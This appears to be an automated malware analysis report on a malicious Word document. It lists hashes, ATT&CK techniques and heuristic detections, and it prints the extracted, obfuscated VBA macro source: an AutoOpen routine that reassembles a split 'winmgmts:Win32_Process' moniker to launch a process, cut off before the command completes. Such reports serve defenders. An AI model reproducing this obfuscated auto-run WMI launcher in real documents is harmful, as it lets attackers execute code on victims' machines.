Office (OLE) malware analysis — malicious · f0f86903255f88f4

MALICIOUS

Office (OLE)

139.4 KB Created: 2019-05-08 08:22:00 Authoring application: Microsoft Office Word First seen: 2019-08-04

MD5: e2ca9597d4f74344b9020ce7ee94d4b7 SHA-1: cbfd43b77becfd8156e2b1f98352f97dd9f14d7d SHA-256: f0f86903255f88f4d0a80355d0dcc331e0f33f32b30505115fcd4727e91bbf33

302 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1137.001 Office Application Startup T1218.011 Signed Binary Proxy Execution: Rundll32

The sample contains VBA macros with an autoopen function, indicating it attempts to execute code upon opening. The critical heuristic firing for 'OLE_VBA_WMI_PROCESS_CREATE' and the obfuscated string 'winmgmts:' strongly suggest the macro uses WMI to launch a process. This is a common technique for downloading and executing further malicious payloads.

Heuristics 8

ClamAV: Doc.Malware.00536d-6965367-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.00536d-6965367-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6984 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6984 bytes
SHA-256: `84c663c34477df16dacaeab6a8a5fc6075247ed83f24890ab223b8594cdc6c6c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "M246162" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "W75171" Attribute VB_Base = "0{5232B8A3-B181-49D8-B532-74C75EEFF060}{C67784F5-0991-4AE8-8B93-3A450D366215}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "C853284" Attribute VB_Name = "U_739739" Attribute VB_Name = "C59766_9" Attribute VB_Base = "0{58074626-F754-4CCA-9482-D9A559A3D037}{BE9925B2-ABCD-49CE-BA27-219726281349}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "J899695" Function G6805488(w88186) While w73229 And c74_9_7_ 'L504_29k48804V648212_E6_71612 'f82448r_57823l14856U3243794 'm4_567Y46994R186329X4374739 Wend While z077967 And u3086_34 'r0_68_j08200z_031404f767569 'Y_40876z84117_3O61841Y1635422 'D286624d60821I54195q494_0_8 Wend Set G6805488 = CVar(w88186) While s71981 And w_02_79 'L63293f11358C1_419j0_19033 'c6411448E4648_07F6456049q0562701 'A484945r_8509s63_75M__221 Wend While R9611599 And q00264 'q29039Y6_80116S472351N4154__ 'z66802_3J90592_1t4935_75l_51609 'X3_6497P3506_17R06623U00_44 Wend While f8352986 And S_66670 'W421220U042811l53667b6225_ 'N757233E24336N295_07_V961038 'j126256q041932E490827Z14269 Wend End Function Sub _ autoopen() On Error Resume Next While s593013 And o227891 'D45002J5398385Y_571948n7402393 'c86_0020Z36_6_95b34_371W554340 'm3767_3W43541R469408X1037864 Wend While r808959_ And T54637 'O63359X25455I_325318f158418 'Q774247_M0_0543l1665_2p9471734 'D003526M142838G3511039s471074 Wend While V_9250_ And j62651 'v_46472D_4310_R257382z3866_8 'd02473_9A7721182o750_2d6564_58 'd2858551i69975U3567236L894987 Wend Call d68418 While i1139474 And F3_325 'z5437_0B93666W79403F8226_1 'L4856245d_87961t2220953Z18694 'q_650790E576330I07107Y06_4793 Wend While l802_574 And h4649831 'w6_07727w58387w954803b1530_09 'v654_739L721713r283777F69660 'c66951l0048985f349853p0824366 Wend While I9870_ And N_021392 'v445_268T6714_9G__83752r4769_ 'n06233m50915_B_810613N9_019_1 'A98280c35547u_0460M9960_1 Wend End Sub Attribute VB_Name = "w43741" Function d68418() On Error Resume Next While w62_5640 And b53910 'c782552s81982I2870_67f163117 'P0180755W044__97i2699697A3647125 'Y65_3948M595224O0905834u0490329 Wend While Z62_702 And G13439_6 'Z5257027S_09522b28817i67413 'A4172648H35_181i99202E_24931 'E4110147n85038z43366_3H4_563 Wend While i02497_ And K2_2865_ 'H3278661i67522T053347u38475 'P63503U3866_6f36_1917p992193 'A368090f0_967_3O93087f2793103 Wend G83379 = W75171.j55255_.ControlTipText + C59766_9.M14_9569 + W75171.j55255_.ControlTipText + C59766_9.u00857 + W75171.j55255_ + W75171.j55255_.PasswordChar + C59766_9.Y_01297 + W75171.j55255_.ControlTipText + W75171.j55255_.PasswordChar + C59766_9.Z7730103 + W75171.j55255_.ControlSource + C59766_9.T9553_ + W75171.j55255_.PasswordChar While Q504951_ And b456_64 'c58206A4374568c6__61X76240 'H573_03j6_2__X9717_87u3__53 'B11183p6806885n776_8S6182867 Wend While a51576 And k541304 'M__167l296866j584125_I6452968 'K_9100F1004630M972689_i8207678 'X2850_1t23685E624068w139064 Wend While V6562518 And z6766073 'n26788R658_146v_8349j7681832 'B99584b477217D76999G38685 'B6636450b21561J686310D929088 Wend Set w52_15 = G6805488(GetObject("winmg" + "mts:W" + "in32_Proc ... (truncated)

SHA-256: 84c663c34477df16dacaeab6a8a5fc6075247ed83f24890ab223b8594cdc6c6c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "M246162"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "W75171"
Attribute VB_Base = "0{5232B8A3-B181-49D8-B532-74C75EEFF060}{C67784F5-0991-4AE8-8B93-3A450D366215}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "C853284"

Attribute VB_Name = "U_739739"

Attribute VB_Name = "C59766_9"
Attribute VB_Base = "0{58074626-F754-4CCA-9482-D9A559A3D037}{BE9925B2-ABCD-49CE-BA27-219726281349}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "J899695"
Function G6805488(w88186)
         While w73229 And c74_9_7_
'L504_29k48804V648212_E6_71612
'f82448r_57823l14856U3243794
'm4_567Y46994R186329X4374739
      Wend
         While z077967 And u3086_34
'r0_68_j08200z_031404f767569
'Y_40876z84117_3O61841Y1635422
'D286624d60821I54195q494_0_8
      Wend
Set G6805488 = CVar(w88186)
         While s71981 And w_02_79
'L63293f11358C1_419j0_19033
'c6411448E4648_07F6456049q0562701
'A484945r_8509s63_75M__221
      Wend
         While R9611599 And q00264
'q29039Y6_80116S472351N4154__
'z66802_3J90592_1t4935_75l_51609
'X3_6497P3506_17R06623U00_44
      Wend
         While f8352986 And S_66670
'W421220U042811l53667b6225_
'N757233E24336N295_07_V961038
'j126256q041932E490827Z14269
      Wend
End Function
Sub _
autoopen()
On Error Resume Next
         While s593013 And o227891
'D45002J5398385Y_571948n7402393
'c86_0020Z36_6_95b34_371W554340
'm3767_3W43541R469408X1037864
      Wend
         While r808959_ And T54637
'O63359X25455I_325318f158418
'Q774247_M0_0543l1665_2p9471734
'D003526M142838G3511039s471074
      Wend
         While V_9250_ And j62651
'v_46472D_4310_R257382z3866_8
'd02473_9A7721182o750_2d6564_58
'd2858551i69975U3567236L894987
      Wend
Call d68418
         While i1139474 And F3_325
'z5437_0B93666W79403F8226_1
'L4856245d_87961t2220953Z18694
'q_650790E576330I07107Y06_4793
      Wend
         While l802_574 And h4649831
'w6_07727w58387w954803b1530_09
'v654_739L721713r283777F69660
'c66951l0048985f349853p0824366
      Wend
         While I9870_ And N_021392
'v445_268T6714_9G__83752r4769_
'n06233m50915_B_810613N9_019_1
'A98280c35547u_0460M9960_1
      Wend
End Sub


Attribute VB_Name = "w43741"
Function d68418()
On Error Resume Next
         While w62_5640 And b53910
'c782552s81982I2870_67f163117
'P0180755W044__97i2699697A3647125
'Y65_3948M595224O0905834u0490329
      Wend
         While Z62_702 And G13439_6
'Z5257027S_09522b28817i67413
'A4172648H35_181i99202E_24931
'E4110147n85038z43366_3H4_563
      Wend
         While i02497_ And K2_2865_
'H3278661i67522T053347u38475
'P63503U3866_6f36_1917p992193
'A368090f0_967_3O93087f2793103
      Wend
G83379 = W75171.j55255_.ControlTipText + C59766_9.M14_9569 + W75171.j55255_.ControlTipText + C59766_9.u00857 + W75171.j55255_ + W75171.j55255_.PasswordChar + C59766_9.Y_01297 + W75171.j55255_.ControlTipText + W75171.j55255_.PasswordChar + C59766_9.Z7730103 + W75171.j55255_.ControlSource + C59766_9.T9553_ + W75171.j55255_.PasswordChar
         While Q504951_ And b456_64
'c58206A4374568c6__61X76240
'H573_03j6_2__X9717_87u3__53
'B11183p6806885n776_8S6182867
      Wend
         While a51576 And k541304
'M__167l296866j584125_I6452968
'K_9100F1004630M972689_i8207678
'X2850_1t23685E624068w139064
      Wend
         While V6562518 And z6766073
'n26788R658_146v_8349j7681832
'B99584b477217D76999G38685
'B6636450b21561J686310D929088
      Wend
Set w52_15 = G6805488(GetObject("winmg" + "mts:W" + "in32_Proc
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.